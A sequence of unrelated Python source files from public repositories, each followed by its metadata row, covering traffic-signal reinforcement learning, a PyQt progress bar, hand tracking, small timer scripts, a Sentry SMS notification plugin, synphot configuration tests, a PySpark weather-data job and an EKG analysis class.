                for lane in self.out_lanes:
                    if lane in agent.in_lanes:
                        if lane in agent.out_lanes:
                            if agent not in self.neighbours:
                                self.neighbours.append(agent)
                            if agent.ID not in self.neighbours_lanes_dict.keys():
                                self.neighbours_lanes_dict.update({agent.ID : [lane]})
                            else:
                                self.neighbours_lanes_dict[agent.ID].append(lane)
    def set_phase(self, eng, phase):
        """
        sets the phase of the agent to the indicated phase
        :param eng: the cityflow simulation engine
        :param phase: the phase object, its ID corresponds to the phase ID in the simulation environment
        """
        eng.set_tl_phase(self.ID, phase.ID)
        self.phase = phase
    def observe(self, eng, time, lanes_count, lane_vehs, vehs_distance):
        """
        generates the observations made by the agents
        :param eng: the cityflow simulation engine
        :param time: the time of the simulation
        :param lanes_count: a dictionary with lane ids as keys and vehicle count as values
        :param lane_vehs: a dictionary with lane ids as keys and list of vehicle ids as values
        :param vehs_distance: dictionary with vehicle ids as keys and their distance on their current lane as value
        """
        observations = self.phase.vector + self.get_in_lanes_veh_num(eng, lane_vehs, vehs_distance) + self.get_out_lanes_veh_num(eng, lanes_count)
        return observations
    def get_reward(self, lanes_count):
        """
        gets the reward of the agent in the form of pressure
        :param lanes_count: a dictionary with lane ids as keys and vehicle count as values
        """
        # Negative absolute pressure: zero is best, more imbalance is worse.
        self_pressure = -np.abs(np.sum([x.get_pressure(lanes_count) for x in self.movements.values()]))
        return self_pressure
    def update_arr_dep_veh_num(self, eng, lanes_vehs):
        """
        Updates the list containing the number vehicles that arrived and departed
        :param lanes_vehs: a dictionary with lane ids as keys and number of vehicles as values
        """
        for movement in self.movements.values():
            movement.update_arr_dep_veh_num(eng, lanes_vehs, self.action)
    def update_wait_time(self, time, action, phase, lanes_count):
        """
        Updates movements' waiting time - the time a given movement has waited to be enabled
        :param time: the current time
        :param action: the phase to be chosen for the intersection in this time step
        :param phase: the phase at the intersection up till this time step
        :param lanes_count: a dictionary with lane ids as keys and vehicle count as values
        """
        for movement in self.movements.values():
            movement.update_wait_time(time, action, phase, lanes_count)
    def reset_movements(self):
        """
        Resets the set containing the vehicle ids for each movement and the arr/dep vehicles numbers as well as the waiting times
        the set represents the vehicles waiting on incoming lanes of the movement
        """
        self.phase = self.clearing_phase
        for move in self.movements.values():
            move.prev_vehs = set()
            move.arr_vehs_num = []
            move.dep_vehs_num = []
            move.last_on_time = 0
            move.waiting_time = 0
            move.max_waiting_time = 0
            move.waiting_time_list = []
            move.arr_rate = 0
    def update_priority_idx(self, time):
        """
        Updates the priority of the movements of the intersection, the higher priority the more the movement needs to get a green lights
        :param time: the time in the simulation, at this moment only integer values are supported
        """
        for idx, movement in zip(self.movements.keys(), self.movements.values()):
            if idx in self.phase.movements:
                movement.priority = ((movement.green_time * movement.max_saturation) / (movement.green_time + movement.clearing_time))
            else:
                # Movements not currently enabled pay an extra clearing-time
                # penalty in the denominator.
                penalty_term = movement.clearing_time
                movement.priority = ((movement.green_time * movement.max_saturation) /
                                     (movement.green_time + movement.clearing_time + penalty_term))
    def update_clear_green_time(self, time):
        """
        Updates the green times of the movements of the intersection
        :param time: the time in the simulation, at this moment only integer values are supported
        """
        for movement in self.movements.values():
            green_time = movement.get_green_time(time, self.phase.movements)
            movement.green_time = green_time
    # def get_flow_density(self, time, lanes_count):
    #     datapoints = []
    #     for move in self.movements.values():
    #         density = lanes_count[move.in_lanes[0]] / move.in_length
    #         if time == 0:
    #             flow = 0
    #         else:
    #             flow = (move.get_arr_veh_num(time-60, time) / 60
    #         datapoints.append((density, flow))
    #     return datapoints
    # def get_flow_density(self, time, lanes_count):
    #     flow = []
    #     density = []
    #     for move in self.movements.values():
    #         if time != 0:
    #             if time >= 60:
    #                 f = move.get_arr_veh_num(time-60, time) / 60
    #             else:
    #                 f = move.get_arr_veh_num(0, time) / time
    #             flow.append(f)
    #             density.append(f / move.max_speed)
    #             # density.append(lanes_count[move.in_lanes[0]] / move.in_length)
    #     return (np.mean(flow), np.mean(density))
| mbkorecki/rl_traffic | src/agent.py | agent.py | py | 11,440 | python | en | code | 1 | github-code | 36 |
12139898242 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Color-coded progress bars
"""
__author__ = "Argentina Ortega Sainz"
__copyright__ = "Copyright (C) 2015 Argentina Ortega Sainz"
__license__ = "MIT"
__version__ = "2.0"
import sys
from PyQt4 import QtGui
from PyQt4.QtGui import QProgressBar
DEFAULT_STYLE = """
QProgressBar{
border: 1px solid black;
border-radius: 2px;
}
QProgressBar::chunk {
background-color: rgb(76, 175, 80);
width: 25px;
}
"""
class CProgressBar(QProgressBar):
    """Slim progress bar whose chunk colour tracks the current value:
    green above 70, yellow for 51-70, red at 50 and below.
    """

    # Stylesheet template used by change_color(); %s receives an rgb(...) string.
    _CSS_TEMPLATE = """
        QProgressBar{
            border: 1px solid gray;
            border-radius: 2px;
        }
        QProgressBar::chunk {
            background: %s;
            width: 1px;
        }
        """

    def __init__(self, parent):
        QProgressBar.__init__(self, parent)
        self.setStyleSheet(DEFAULT_STYLE)
        self.setMaximumHeight(7)

    def setValue(self, p_int):
        """Set the value and recolour the chunk according to its range."""
        QProgressBar.setValue(self, p_int)
        if p_int > 70:
            colour = 'rgb(76, 175, 80)'   # Green
        elif p_int > 50:
            colour = 'rgb(255, 193, 7)'   # Yellow
        else:
            colour = 'rgb(244, 67, 54)'   # Red
        self.change_color(colour)

    def change_color(self, color):
        """Re-style the bar with the given CSS colour string."""
        self.setStyleSheet(self._CSS_TEMPLATE % color)
def main():
    """Show a demo colour-coded progress bar.

    Bug fix: the original called ``bar.example()``, but CProgressBar defines
    no ``example`` method, so the demo crashed with AttributeError before a
    window ever appeared.  Seed the bar with a value instead so the colour
    logic is actually visible.
    """
    app = QtGui.QApplication(sys.argv)
    bar = CProgressBar(None)
    bar.setValue(60)  # yellow range; change to see the other colours
    bar.show()
    sys.exit(app.exec_())
| argenos/AUI | aui/utilities/ColorProgressBar.py | ColorProgressBar.py | py | 1,563 | python | en | code | 0 | github-code | 36 |
25482260523 | import cv2
import time
import mediapipe as mp
# NOTE(review): index 1 selects the SECOND camera; use 0 for the default one.
cap = cv2.VideoCapture(1)
mp_hands = mp.solutions.hands
hands = mp_hands.Hands() #hands.py ctrl+left mouse
mp_draw = mp.solutions.drawing_utils
# Timestamps used to derive the displayed frames-per-second figure.
new_frame_time = 0
prev_frame_time = 0
while True:
    ret, frame = cap.read()
    new_frame_time = time.time()
    fps = 1 / (new_frame_time - prev_frame_time)
    prev_frame_time = new_frame_time
    cv2.putText(frame, f'FPS: {int(fps)}', (40, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 0, 0), 3)
    # MediaPipe expects RGB; OpenCV captures BGR.
    img_RGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    result = hands.process(img_RGB)
    # print(result.multi_hand_landmarks)
    if result.multi_hand_landmarks: # landmark will give information about x and y coordinates
        for hand_landmark in result.multi_hand_landmarks:
            for id, landmark in enumerate(hand_landmark.landmark):
                # print(id, landmark)
                # To get the pixel: landmark coords are normalised to [0, 1].
                height, width, channel = frame.shape
                coordinates_x, coordinates_y = int(landmark.x * width), int(landmark.y * height)
                print(id, coordinates_x, coordinates_y)
            mp_draw.draw_landmarks(frame, hand_landmark, mp_hands.HAND_CONNECTIONS)
    cv2.imshow('Frame', frame)
    # Quit on 'q'.
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
| atuad7535/Volume_Control_Using_Hand_Gesture | Hand_Tracking.py | Hand_Tracking.py | py | 1,333 | python | en | code | 7 | github-code | 36 |
13643223508 | from time import *
# Script 1: stopwatch -- press 1 to (re)start, 2 to stop; award points by speed.
# NOTE(review): if the user enters 2 before ever entering 1, `start_timer`
# is never assigned and line `total = end_timer-start_timer` raises NameError.
timer = int(input("1 - start, 2 - end: "))
while timer != 2:
    if timer == 1:
        start_timer = time()
    timer = int(input("1 - start, 2 - end: "))
end_timer = time()
total = end_timer-start_timer
print("Time that has passed:",total,"seconds")
# Award 3/2/1 points for under 10s / 10-15s / 15s and over.
points = 0
if total < 10:
    points += 3
elif total >= 10 and total < 15:
    points += 2
else:
    points += 1
print("You are awarded:",points,"points")
###########################################################
# Script 2: simple one-second-tick countdown from a user-supplied start.
from time import *
countdown_start = int(input("Enter a starting time: "))
countdown = countdown_start
while countdown > 0:
    print(countdown)
    countdown -= 1
    sleep(1)
print("Your countdown finished after:",countdown_start,"seconds!")
###########################################################
# Script 3: fake download timer -- file size (MB?) * 8 bits / speed.
# NOTE(review): a speed of 0 raises ZeroDivisionError; units are unchecked.
from time import *
file_size = int(input("What is the file size: "))
internet_speed = int(input("What is your internet speed: "))
file_size *= 8
download_time = file_size/internet_speed
print("Time to complete download:",download_time,"seconds")
countdown = round(download_time)
while countdown > 0:
    print(countdown)
    countdown -= 1
    sleep(1)
print("Download Completed!") | Joshwen7947/Zero-to-Knowing | Udemy_code/lesson 12 code/main.py | main.py | py | 1,178 | python | en | code | 0 | github-code | 36 |
class Solution:
    def maxVowels(self, s: str, k: int) -> int:
        """Return the maximum number of vowels in any substring of length k.

        Fixed-size sliding window: count vowels in the first window, then
        slide one character at a time, adjusting the count at both edges.
        """
        vowel_set = set("aeiou")
        current = sum(1 for ch in s[:k] if ch in vowel_set)
        best = current
        for i in range(k, len(s)):
            current += (s[i] in vowel_set) - (s[i - k] in vowel_set)
            if current > best:
                best = current
        return best
| dzaytsev91/leetcode-algorithms | medium/1456_maximum_number_of_vowels_in_a_substring_of_given_length.py | 1456_maximum_number_of_vowels_in_a_substring_of_given_length.py | py | 567 | python | en | code | 2 | github-code | 36 |
74353872105 | import re
import phonenumbers
from django import forms
from django.utils.translation import ugettext_lazy as _
from kavenegar import *
from sentry import http
from sentry.plugins.bases.notify import NotificationPlugin
import sentry_kavenegar
DEFAULT_REGION = 'IR'
MAX_SMS_LENGTH = 160
def validate_phone(phone):
    """Return True if *phone* parses as a possible and valid number for
    DEFAULT_REGION, False otherwise."""
    try:
        parsed = phonenumbers.parse(phone, DEFAULT_REGION)
    except phonenumbers.NumberParseException:
        return False
    return (phonenumbers.is_possible_number(parsed)
            and phonenumbers.is_valid_number(parsed))
def clean_phone(phone):
    """Normalise *phone* to E.164 format.

    This could raise, but should have been checked with validate_phone first.
    """
    parsed = phonenumbers.parse(phone, DEFAULT_REGION)
    return phonenumbers.format_number(parsed, phonenumbers.PhoneNumberFormat.E164)
def basic_auth(user, password):
    """Return an HTTP Basic-Auth header value for *user*/*password*.

    Bug fix: the original used ``str.encode('base64')``, a Python-2-only
    codec that raises LookupError on Python 3 (and needed a newline strip).
    ``base64.b64encode`` produces the identical digest without newlines and
    works on both Python 2 and 3.
    """
    import base64
    token = base64.b64encode((user + ':' + password).encode('utf-8')).decode('ascii')
    return 'Basic ' + token
def split_sms_to(data):
    """Split a comma- and/or whitespace-separated recipient string into a
    set of non-empty tokens."""
    tokens = re.split(r'\s*,\s*|\s+', data)
    return {token for token in tokens if token}
class KavenegarConfigurationForm(forms.Form):
    """Project-level settings form: Kavenegar API key, sender number and up
    to ten recipient numbers (validated and normalised to E.164)."""
    api_key = forms.CharField(label=_('API KEY'), required=True,
                              widget=forms.TextInput(attrs={'class': 'span6'}))
    sms_from = forms.CharField(label=_('SMS FROM'), required=True,
                               widget=forms.TextInput(attrs={'class': 'span6'}))
    sms_to = forms.CharField(label=_('SMS To #s'), required=True,
                             help_text=_('Recipient(s) phone numbers separated by commas or lines'),
                             widget=forms.Textarea(attrs={'placeholder': 'e.g. +98935XXXXXXX, 0912XXXXXXXX'}))
    def clean_sms_to(self):
        # Validate every number, then store them sorted, comma-joined, E.164.
        data = self.cleaned_data['sms_to']
        phones = split_sms_to(data)
        if len(phones) > 10:
            raise forms.ValidationError('Max of 10 phone numbers, {0} were given.'.format(len(phones)))
        for phone in phones:
            if not validate_phone(phone):
                raise forms.ValidationError('{0} is not a valid phone number.'.format(phone))
        return ','.join(sorted(map(clean_phone, phones)))
    def clean(self):
        # TODO: Ping Kavenegar and check credentials (?)
        return self.cleaned_data
class KavenegarPlugin(NotificationPlugin):
    """Sentry notification plugin that sends event alerts as SMS messages
    through the Kavenegar gateway."""
    author = 'Amir Asaran'
    author_url = 'https://github.com/amirasaran/sentry-kavenegar'
    version = sentry_kavenegar.VERSION
    description = 'A plugin for Sentry, which sends SMS notifications via Kavenegar'
    resource_links = (
        ('Documentation', 'https://github.com/amirasaran/sentry-kavenegar/blob/master/README.md'),
        ('Bug Tracker', 'https://github.com/amirasaran/sentry-kavenegar/issues'),
        ('Source', 'https://github.com/amirasaran/sentry-kavenegar'),
        ('Kavenegar', 'https://www.kavenegar.com/'),
    )
    slug = 'kavenegar'
    title = _('Kavenegar (SMS)')
    conf_title = title
    conf_key = 'kavenegar'
    project_conf_form = KavenegarConfigurationForm
    def is_configured(self, project, **kwargs):
        # Plugin is usable once both the API key and recipients are set.
        return all([self.get_option(o, project) for o in (
            'api_key', 'sms_to')])
    def get_send_to(self, *args, **kwargs):
        # This doesn't depend on email permission... stuff.
        return True
    def notify_users(self, group, event, **kwargs):
        """Build a short SMS body for the event and send it to every
        configured recipient; raise the first (or an aggregate) error."""
        project = group.project
        # NOTE(review): .encode("utf-8") inside .format() yields b'...' reprs
        # on Python 3 -- this formatting presumably targets Python 2; confirm.
        body = "Sentry [{0}] {1}: {2}".format(
            project.name.encode("utf-8"),
            event.group.get_level_display().upper().encode("utf-8"),
            event.title.encode("utf-8").splitlines()[0],
        )
        # Trim to a single SMS segment.
        body = body[:MAX_SMS_LENGTH]
        api_key = self.get_option('api_key', project)
        sms_to = self.get_option('sms_to', project)
        sms_from = self.get_option('sms_from', project)
        if not sms_to:
            return
        sms_to = split_sms_to(sms_to)
        instance = KavenegarAPI(api_key)
        errors = []
        # Send per recipient, collecting errors so one failure does not stop
        # delivery to the rest.
        for phone in sms_to:
            if not phone:
                continue
            try:
                phone = clean_phone(phone)
                params = {
                    'sender': sms_from,
                    'receptor': phone,
                    'message': body
                }
                instance.sms_send(
                    params
                )
            except Exception as e:
                errors.append(e)
        if errors:
            if len(errors) == 1:
                raise errors[0]
            # TODO: multi-exception
            raise Exception(errors)
| amirasaran/sentry-kavenegar | sentry_kavenegar/models.py | models.py | py | 4,522 | python | en | code | 3 | github-code | 36 |
6673487305 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Test config.py module."""
# STDLIB
import os
# THIRD-PARTY
import numpy as np
import pytest
# SYNPHOT
from synphot.config import conf as synconf
from synphot.utils import generate_wavelengths
# LOCAL
from stsynphot import config
from stsynphot.stio import get_latest_file, irafconvert
class TestOverwriteSynphot:
    """Test if overwriting ``synphot`` defaults is successful."""
    def setup_class(self):
        # For some reason, this does not automatically execute during testing.
        config.overwrite_synphot_config(config.conf.rootdir)
        # Cache the overwritten Vega spectrum path for the tests below.
        self.vegafile = synconf.vega_file
    def test_dirname(self):
        # The overwritten path must live under the configured root directory.
        assert self.vegafile.startswith(config.conf.rootdir)
    @pytest.mark.remote_data
    def test_isfile(self):
        if self.vegafile.startswith(('ftp', 'http')):
            # This is the case on Travis CI
            pytest.xfail('Cannot test this over FTP or HTTP')
        else:
            assert os.path.isfile(self.vegafile)
@pytest.mark.remote_data
class TestConfigChanges:
    """Verify config items can be changed and then reset to their defaults."""
    def setup_class(self):
        # Snapshot the default reference values for later comparison.
        self.def_dict = config.getref()
    @pytest.mark.parametrize(
        ('cfgname', 'new_val'),
        [('graphtable', 'mtab$n9i1408hm_tmg.fits'),
         ('comptable', 'mtab$n9i1408im_tmc.fits'),
         ('thermtable', 'mtab$n5k15531m_tmt.fits')])
    def test_tables_area(self, cfgname, new_val):
        # Same as config.conf.cfgname = new_val
        setattr(config.conf, cfgname, new_val)
        assert getattr(config.conf, cfgname) == new_val
        # Reset to default
        config.conf.reset(cfgname)
        # Expand IRAF-style path and pick the latest file before comparing.
        old_expanded_val = get_latest_file(irafconvert(
            getattr(config.conf, cfgname)))
        assert old_expanded_val == self.def_dict[cfgname]
    def test_area(self):
        config.conf.area = 1
        assert config.conf.area == 1
        # Reset to default
        config.conf.reset('area')
        assert config.conf.area == self.def_dict['area']
    def test_waveset(self):
        # Install a small linear waveset, check endpoints and description.
        w = generate_wavelengths(
            minwave=3000, maxwave=5000, num=100, log=False)
        config.conf.waveset_array = w[0].value.tolist()
        config.conf.waveset = w[1]
        np.testing.assert_allclose(
            [config.conf.waveset_array[0], config.conf.waveset_array[-1]],
            [3000, 4980])
        assert (config.conf.waveset ==
                'Min: 3000, Max: 5000, Num: 100, Delta: None, Log: False')
        # Reset to default
        config.conf.reset('waveset_array')
        config.conf.reset('waveset')
        np.testing.assert_allclose(
            [config.conf.waveset_array[0], config.conf.waveset_array[-1]],
            [500, 25989.72879567])
        assert config.conf.waveset == self.def_dict['waveset']
| spacetelescope/stsynphot_refactor | stsynphot/tests/test_config.py | test_config.py | py | 2,785 | python | en | code | 11 | github-code | 36 |
36771601568 | ## dammit-turnip
## Version: 0.1
## Author: Adam Lenart
## Main file that interacts with the user
## standard imports
import argparse
## 3rd parth imports
from PIL import Image
## own modules
from src import dialog_action
from src import processor
###################################################################################
## Options ##
###################################################################################
## ----------------------- Command line arguments ------------------------------ ##
# Command-line interface: every option may also be supplied interactively
# below when omitted.
parser = argparse.ArgumentParser(description='Create a circular image and draw ' +
                                 'a colored circle around its edge.' )
parser.add_argument('input', help='path to input file')
parser.add_argument('output', help='path to output file. The output format must be PNG.')
parser.add_argument('-x', type=int, help='integer, x coordinate of the center of the circle. 0 is left.')
parser.add_argument('-y', type=int, help='integer, y coordinate of the center of the circle. 0 is top.')
parser.add_argument('-d', type=int, help='integer, diameter of the circle in pixels.')
parser.add_argument('-R', type=int,
                    help='integer, R in RGBA color specifications, e.g., 150 in "(150,0,100,255)".')
parser.add_argument('-G', type=int,
                    help='integer, G in RGBA color specifications, e.g., 0 in "(150,0,100,255)".')
parser.add_argument('-B', type=int,
                    help='integer, B in RGBA color specifications, e.g., 100 in "(150,0,100,255)".')
parser.add_argument('-A', type=int,
                    help='integer, A in RGBA color specifications, e.g., 255 in "(150,0,100,255)".')
parser.add_argument('-width', type=int, help='integer, width of circle line in pixels.')
parser.add_argument('--resize', action='store_true', help='Resize to 300 x 300 pixels.')
parser.add_argument('--no-resize', action='store_true', help='Do not resize the picture.')
args = parser.parse_args()
## -------------------------- resize options ------------------------------------- ##
# Accepted yes/no spellings for the interactive resize prompt.
yes = {'yes','y', 'ye'}
no = {'no','n'}
allowed_responses = yes.union(no)
## continue loop below until yes or no arrives
CONT = True
#####################################################################################
##                                      Run                                        ##
#####################################################################################
if __name__ == "__main__":
    print("dammit-turnip 0.1.\n\n")
    print("Make a circle from the input image and color the edge of it.\n")
    input_image = Image.open(args.input)
    print("Dimensions of the input image: {dim}".format(dim=input_image.size))
    # Circle geometry: fall back to interactive prompts when flags are absent.
    if args.x is None:
        print("\nProvide input for the position of the circle on the original image.\n")
        x = int(input("X coordinate of the center of the circle (0 is left): "))
    else:
        x = args.x
    if args.y is None:
        y = int(input("Y coordinate of the center of the circle (0 is top): "))
    else:
        y= args.y
    if args.d is None:
        d = int(input("Diameter of the circle in pixels: "))
    else:
        d = args.d
    # RGBA channels: R/G/B default to 0, A defaults to 255 on empty input.
    if args.R is None:
        print("\nNext, provide input for the color of the circle in RGBA format.\n")
        R = input('R channel color, integer between 0 and 255 (press ENTER for default): ')
        if R == '':
            R = 0
        else:
            R = int(R)
    else:
        R = args.R
    if args.G is None:
        G = input('G channel color, integer between 0 and 255 (press ENTER for default): ')
        if G == '':
            G = 0
        else:
            G = int(G)
    else:
        G = args.G
    if args.B is None:
        B = input('B channel color, integer between 0 and 255 (press ENTER for default): ')
        if B == '':
            B = 0
        else:
            B = int(B)
    else:
        B = args.B
    if args.A is None:
        A = input('A channel color, integer between 0 and 255 (press ENTER for default): ')
        if A == '':
            A = 255
        else:
            A = int(A)
    else:
        A = args.A
    # Line width defaults to 1% of the diameter.
    if args.width is None:
        width = input("Width of the circle line in pixels (press ENTER for default): ")
        if width == '':
            width = int(d / 100)
        else:
            width = int(width)
    else:
        width = args.width
    ## Make circle
    circle = processor.circle_maker(input_image, (x,y), d, width, (R,G,B,A))
    ## Resize?
    # --resize / --no-resize bypass the interactive question entirely.
    if args.resize:
        dialog_action.yes_action(circle, args.output)
    elif args.no_resize:
        dialog_action.no_action(circle, args.output)
    else:
        while CONT:
            response = input("\nWe have now a circular shaped image.\n" +
                             "Resize it to LinkedIn size recommendation (300 x 300)? (yes/no): ").lower()
            if response in allowed_responses:
                dialog_action.response_action(response, yes, no, circle, args.output)
                break
            while response not in allowed_responses:
                response = input("Please respond with 'yes' or 'no': ")
                if response in allowed_responses:
                    dialog_action.response_action(response, yes, no, circle, args.output)
                    CONT = False
                    break
| adamlenart/dammit-turnip | make_circle.py | make_circle.py | py | 5,417 | python | en | code | 0 | github-code | 36 |
448222125 | from __future__ import print_function
from pyspark.sql import functions as F
from pyspark.sql.functions import mean, min, max, variance, lag, count, col
from pyspark import sql
from pyspark import SparkContext, SparkConf
from pyspark.sql.types import ArrayType, StringType, IntegerType, DoubleType, LongType, FloatType
from pyspark.sql.types import *
from pyspark.sql.functions import date_format
from datetime import datetime
from pyspark.sql.functions import sum,trim,udf,lit
from pyspark.sql import Row
from pyspark.sql.functions import monotonically_increasing_id
from pyspark.sql import HiveContext
from pyspark.sql import SparkSession
from pyspark.sql.window import Window
if __name__ == "__main__":
        import os
        import sys
        import shutil
        import subprocess
        # Positional CLI arguments: database names, JDBC credentials and
        # bookkeeping identifiers passed in by the orchestrating shell script.
        db_certified = sys.argv[1]
        db_analytical_ds = sys.argv[2]
        db_analytical_temp = sys.argv[3]
        username= sys.argv[4]
        password= sys.argv[5]
        db= sys.argv[6]
        connection_str= sys.argv[7]
        source= sys.argv[8]
        group_id= sys.argv[9]
        table_name=sys.argv[10]
        cur_script= sys.argv[11]
        source_log_euw = sys.argv[12]
        euw_shell_script_path=sys.argv[13]
        # Per-day log directory, created on first run.
        current_dt = str(datetime.now().strftime("%Y%m%d"))
        log_dir = source_log_euw+"/"+current_dt+"/python_script_weather_logs"
        if not os.path.exists(log_dir):
                os.makedirs(log_dir)
        columns="inserted_count,total_count,table_name"
        #**************************************************************************************************************************************************************
        #### happusrd user development cluster
        ### creating spark-session
        spark = SparkSession.builder.appName("EUW_CUSTOMER_LOCATION_WEATHER_DATA").enableHiveSupport().getOrCreate()
        def fileLog(logMsg):
                # Append one line to the job log file.
                with open(log_dir+"/EUW_CUSTOMER_LOCATION_WEATHER_DATA_LOG.log", "a") as myfile:
                        myfile.write(str(logMsg)+ "\n")
        fileLog("################################## EUW_CUSTOMER_LOCATION_WEATHER_DATA script is started ###########################################")
        ### reading fixed flat actual data
        WEATHER_DAILY_FORECAST = spark.sql("select * from "+db_certified+".weather_zip_cd_daily_forecast")
        WEATHER_DAILY_ACTUALS = spark.sql("select zip_code,weather_concepts,weather_date,gmt,avg_daily_temp,min_daily_temp,max_daily_temp,updated_on,batch_id from "+db_certified+".weather_zip_cd_daily_actuals")
        Weather_all = WEATHER_DAILY_FORECAST.unionAll(WEATHER_DAILY_ACTUALS)
        fileLog("weather actuals and forecast have been unioned")
        ### Dcasting and casting weather_date as date
        df = Weather_all
        # Pack the three temperature columns into one comma-joined string so a
        # single pivot aggregation can carry all of them.
        df = df.withColumn('temp_set',F.concat_ws(',',F.col('avg_daily_temp'),F.col('min_daily_temp'),F.col('max_daily_temp')))
        date_format_function = udf (lambda x: datetime.strptime(x, '%Y-%m-%d'), DateType())
        df = df.withColumn("weather_date",date_format_function(date_format(col("weather_date"),"yyyy-MM-dd")))
        # applying pivot on weather concepts
        df1 = df.groupby('zip_code','weather_date').pivot('weather_concepts',['DBT','DPT','HUM']).agg(F.first('temp_set')).orderBy('zip_code','weather_date')
        # Unpack each pivoted concept back into avg/min/max double columns.
        split_col = F.split(df1['DBT'], ',')
        df1 = df1.withColumn('avg_daily_temp_DBT', split_col.getItem(0).cast(DoubleType()))
        df1 = df1.withColumn('min_daily_temp_DBT', split_col.getItem(1).cast(DoubleType()))
        df1 = df1.withColumn('max_daily_temp_DBT', split_col.getItem(2).cast(DoubleType()))
        split_col = F.split(df1['DPT'], ',')
        df1 = df1.withColumn('avg_daily_temp_DPT', split_col.getItem(0).cast(DoubleType()))
        df1 = df1.withColumn('min_daily_temp_DPT', split_col.getItem(1).cast(DoubleType()))
        df1 = df1.withColumn('max_daily_temp_DPT', split_col.getItem(2).cast(DoubleType()))
        split_col = F.split(df1['HUM'], ',')
        df1 = df1.withColumn('avg_daily_temp_HUM', split_col.getItem(0).cast(DoubleType()))
        df1 = df1.withColumn('min_daily_temp_HUM', split_col.getItem(1).cast(DoubleType()))
        df1 = df1.withColumn('max_daily_temp_HUM', split_col.getItem(2).cast(DoubleType()))
        df1 = df1.drop('DBT').drop('DPT').drop('HUM')
        fileLog("Dcasted the weather_concepts")
        Wthr_Dcast = df1.persist()
        Wthr_Dcast_Count=Wthr_Dcast.count()
        fileLog("Final counts :")
        fileLog(Wthr_Dcast_Count)
        Wthr_Dcast.createOrReplaceTempView("Wthr_Dcast")
        spark.sql("drop table if exists "+db_analytical_temp+".Euw_weather_data_temp")
        spark.sql("create table "+db_analytical_temp+".Euw_weather_data_temp as select * from Wthr_Dcast")
        # Assemble "inserted,total,table" for the process-control bookkeeping.
        column_values=[]
        column_values.insert(0,str(Wthr_Dcast_Count))
        column_values.append(str(Wthr_Dcast_Count))
        column_values.append('Euw_weather_data_temp')
        print(column_values)
        column_values=','.join(column_values).rstrip(',')
        print(column_values)
        # NOTE(review): hard-coded dev-cluster path; presumably environment
        # specific -- confirm before reuse elsewhere.
        path='/data01/data/dev/dif/files/scripts/euw'
        os.chdir(path)
        subprocess.Popen(['bash','-c','. {}/process_control.sh; updateProcessControl %s %s %s %s %s %s %s %s %s %s %s'.format(euw_shell_script_path) %(username,password,db,connection_str,source,group_id,table_name,cur_script,db_analytical_temp,columns,column_values)])
        fileLog("################################## EUW_CUSTOMER_LOCATION_WEATHER_DATA script is complete ###########################################")
| avilin66/Pyspark_codes | EUW_CUSTOMER_LOCATION_WEATHER_DATA.py | EUW_CUSTOMER_LOCATION_WEATHER_DATA.py | py | 5,260 | python | en | code | 1 | github-code | 36 |
18248471298 | """
This file contains methods to visualize EKG data, clean EKG data and run EKG analyses.
Classes
-------
EKG
Notes
-----
All R peak detections should be manually inspected with EKG.plotpeaks method and
false detections manually removed with rm_peak method. After rpeak examination,
NaN data can be accounted for by removing false IBIs with rm_ibi method.
"""
import datetime
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import numpy as np
import os
import pandas as pd
import scipy as sp
import statistics
import biosignalsnotebooks as bsnb
from scipy import interpolate
from numpy import linspace, diff, zeros_like, arange, array
from mne.time_frequency import psd_array_multitaper
from pandas.plotting import register_matplotlib_converters
from scipy.signal import welch
from scipy.stats.distributions import chi2
class EKG:
"""
Run EKG analyses including cleaning and visualizing data.
Attributes
----------
metadata : nested dict
File information and analysis information.
Format {str:{str:val}} with val being str, bool, float, int or pd.Timestamp.
data : pd.DataFrame
Raw data of the EKG signal (mV) and the threshold line (mV) at each sampled time point.
rpeak_artifacts : pd.Series
False R peak detections that have been removed.
rpeaks_added : pd.Series
R peak detections that have been added.
ibi_artifacts : pd.Series
Interbeat interval data that has been removed.
rpeaks : pd.Series
Cleaned R peaks data without removed peaks and with added peaks.
rr : np.ndarray
Time between R peaks (ms).
nn : np.ndarray
Cleaned time between R peaks (ms) without removed interbeat interval data.
rpeaks_df : pd.DataFrame
Raw EKG value (mV) and corresponding interbeat interval leading up to the data point (ms) at each sampled point.
"""
def __init__(self, fname, fpath, polarity='positive', min_dur=True, epoched=True, smooth=False, sm_wn=30, mw_size=90, upshift=3.5,
rms_align='right', detect_peaks=True, pan_tompkins=True):
"""
Initialize raw EKG object.
Parameters
----------
fname : str
Filename.
fpath : str
Path to file.
polarity: str, default 'positive'
polarity of the R-peak deflection. Options: 'positive', 'negative'
min_dur : bool, default True
Only load files that are >= 5 minutes long.
epoched : bool, default True
Whether file was epoched using ioeeg.
smooth : bool, default False
Whether raw signal should be smoothed before peak detections. Set True if raw data has consistent high frequency noise
preventing accurate peak detection.
sm_wn : float, default 30
Size of moving window for rms smoothing preprocessing (milliseconds).
mw_size : float, default 100
Moving window size for R peak detection (milliseconds).
upshift : float, default 3.5
Detection threshold upshift for R peak detection (% of signal).
rms_align: str, default 'right'
whether to align the mean to the right or left side of the moving window [options: 'right', 'left']
rm_artifacts : bool, default False
Apply IBI artifact removal algorithm.
detect_peaks : bool, default True
Option to detect R peaks and calculate interbeat intervals.
pan_tompkins : bool, default True
Option to detect R peaks using automatic pan tompkins detection method
Returns
-------
EKG object. Includes R peak detections and calculated inter-beat intervals if detect_peaks is set to True.
"""
# set metadata
filepath = os.path.join(fpath, fname)
if epoched == False:
in_num, start_date, slpstage, cycle = fname.split('_')[:4]
elif epoched == True:
in_num, start_date, slpstage, cycle, epoch = fname.split('_')[:5]
self.metadata = {'file_info':{'in_num': in_num,
'fname': fname,
'path': filepath,
'rpeak_polarity': polarity,
'start_date': start_date,
'sleep_stage': slpstage,
'cycle': cycle
}
}
if epoched == True:
self.metadata['file_info']['epoch'] = epoch
# load the ekg
self.load_ekg(min_dur)
# flip the polarity if R peaks deflections are negative
if polarity == 'negative':
self.data = self.data*-1
if smooth == True:
self.rms_smooth(sm_wn)
else:
self.metadata['analysis_info']['smooth'] = False
self.metadata['analysis_info']['rms_smooth_wn'] = 'N/A'
# create empty series for false detections removed and missed peaks added
self.rpeak_artifacts = pd.Series()
self.rpeaks_added = pd.Series()
self.ibi_artifacts = pd.Series()
# detect R peaks
